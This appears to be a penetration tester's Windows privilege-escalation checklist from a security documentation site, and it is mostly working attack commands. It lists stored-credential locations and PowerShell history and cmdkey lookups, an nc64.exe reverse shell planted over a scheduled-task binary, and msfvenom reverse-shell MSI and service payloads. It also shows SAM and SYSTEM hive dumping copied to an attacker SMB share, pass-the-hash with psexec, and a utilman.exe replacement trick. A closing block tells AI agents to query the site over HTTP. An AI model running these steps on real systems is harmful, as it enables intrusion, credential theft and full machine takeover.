# Checklist - Windows ## Unattended install remnants When installing Windows on a large number of hosts, administrators may use Windows Deployment Services, which allows for a single operating system image to be deployed to several hosts through the network. These kinds of installations are referred to as unattended installations as they don't require user interaction. Such installations require the use of an administrator account to perform the initial setup, which might end up being stored in the machine in the following locations: * [ ] C:\Unattend.xml * [ ] C:\Windows\Panther\Unattend.xml * [ ] C:\Windows\Panther\Unattend\Unattend.xml * [ ] C:\Windows\system32\sysprep.inf * [ ] C:\Windows\system32\sysprep\sysprep.xml * [ ] C:\inetpub\wwwroot\web.config * [ ] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config * [ ] type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString ## Installed software registry saved credentials ### Putty Grab putty creds * [ ] HKEY\_CURRENT\_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s ## Powershell + Cmd history Whenever a user runs a command using Powershell, it gets stored into a file that keeps a memory of past commands. This is useful for repeating commands you have used before quickly. If a user runs a command that includes a password directly as part of the Powershell command line, it can later be retrieved. Windows allows us to use other users' credentials. This function also gives the option to save these credentials on the system. * [ ] type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost\_history.txt * [ ] cmdkey /list * [ ] runas /savecred /user:victim cmd.exe ## Scheduled Tasks Looking into scheduled tasks on the target system, you may see a scheduled task that either lost its binary or it's using a binary you can modify. If our current user can modify or overwrite the "Task to Run" executable, we can control what gets executed by the other user, resulting in a simple privilege escalation. * [ ] schtasks * [ ] schtask /query /tn vulnerable-task /fo list /v * [ ] icacls C:\tasks-path\vulnerable-task.exe * [ ] C:\tmp\nc64.exe -e cmd.exe 4444 > c:\tasks\vulnerable-task.exe * [ ] schtasks /run /tn vulnerable-task ## AlwaysInstallElevated Windows installer files (also known as .msi files) are used to install applications on the system. They usually run with the privilege level of the user that starts it. However, these can be configured to run with higher privileges from any user account (even unprivileged ones). This could potentially allow us to generate a malicious MSI file that would run with admin privileges. * [ ] query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer * [ ] reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer * [ ] msfvenom -p windows/x64/shell\_reverse\_tcp LHOST=\ LPORT=6969 -f msi -o malicious.msi #Create malicious .exe * [ ] msiexec /quiet /qn /i C:\temp\malicious.msi #Execute the malicious MSI file ## Services Windows services are managed by the **Service Control Manager** (SCM). The SCM is a process in charge of managing the state of services as needed, checking the current status of any given service and generally providing a way to configure services. Each service on a Windows machine will have an associated executable which will be run by the SCM whenever a service is started. It is important to note that service executables implement special functions to be able to communicate with the SCM, and therefore not any executable can be started as a service successfully. Each service also specifies the user account under which the service will run. Location: HKLM\SYSTEM\CurrentControlSet\Services\\ ### Weak permissions * [ ] Manually check for services and their permissions \#CHECK IF ANY SERVICE HAS WEAK PERMISSIONS #PRint details about service such has linked executable sc qc vulnerable-service #CHECK LINKED EXECUTABLE PERMISSIONS, HOPEFULLY WE CAN MODIFY (M) icacls C:\program files\somecompany\Service.exe #IF WE CAN MODIFY AN EXECUTABLE LINKED TO A SERVICE, CREATE MALICIOUS EXE-SERVICE EXECUTABLE AND UPLOAD IT msfvenom -p windows/x64/shell\_reverse\_tcp LHOST= LPORT=6969 -f exe-service -o malicious-svc.exe #Make backup of old service executable and then copy malicious to original location copy C:\program files\somecompany\Service.exe C:\temp\Service.backup copy C:\temp\malicious-svc.exe C:\program files\somecompany\Service.exe #RESTART SERVICE (if able) sc stop vulnerable-service sc start vulnerable-service \#CHECK FOR UNQUOTED BINARY\_PATH\_NAME IN SERVICE sc qc "some mtg service" #IF BINARY\_PATH\_NAME IS NOT DOUBLE-QUOTED, WE MIGHT BE ABLE TO HIJACK, e.g: BINARY\_PATH\_NAME : C:\MyPrograms\Magic The Gathering\bin\mtg.exe #TRY PUTTING A MALICIOUS EXE IN EVERY POSSIBLE LOCATIONS C:\MyPrograms\Magic.exe, C:\MyPrograms\Magic The.exe, C:\MyPrograms\Magic The Gathering.exe \#check current privileges whoami /priv ######################## #SEBACKUP / SERESTORE privs ######################## #WITH SUCH PRIVS WE CAN DUMP REGISTRY/CREDS #Dump Registry hive for local analysis reg save hklm\system C:\Users\victim\system.hive reg save hklm\sam C:\Users\victim\sam.hive \#Start a local SMB server to transfer files and copy/transfer them attacker: python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support -username victim -password victimpassword public share victim: copy C:\Users\user\system.hive \attacker-ip\public\\ \#Parse hive python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL \#IF SUCCESSFUL DUMP, start cracking it and pass-the-hash #TRy psexec python3 /usr/share/doc/python3-impacket/examples/psexec.py -hashes aad3h73h:1238d8 Administrator@ \######################## #SeTakeOwnership privs ######################## #WITH SUCH PRIVS WE CAN TAKE OWNERSHIP OF ANY OBJECT (FILES, REGKEYS, ETC) #A nice trick is to replace a system file such as utilman.exe which can be launched at login screen takeown /f C:\Windows\System32\Utilman.exe #OWNING A FILE DOES NOT MEAN HAVING PRIVILEGES, BUT WE CAN ADD SAID PRIVS AFTER OWNING icacls C:\Windows\System32\Utilman.exe /grant our-current-user:F #NOW THAT WE HAVE OWNERSHIP+PRIVS, LETS REPLACE IT WITH A MALICIOUS EXE OR JUST A CMD copy C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe #YOU CAN NOW LOCK OR RESTART AND OPEN THE EASE-OF-ACCESS MENU TO GET A SHELL \######################## #SeImpersonate / SeAssignPrimaryToken ######################## # #Tool: --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://book.turbosec.net/checklist-windows.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.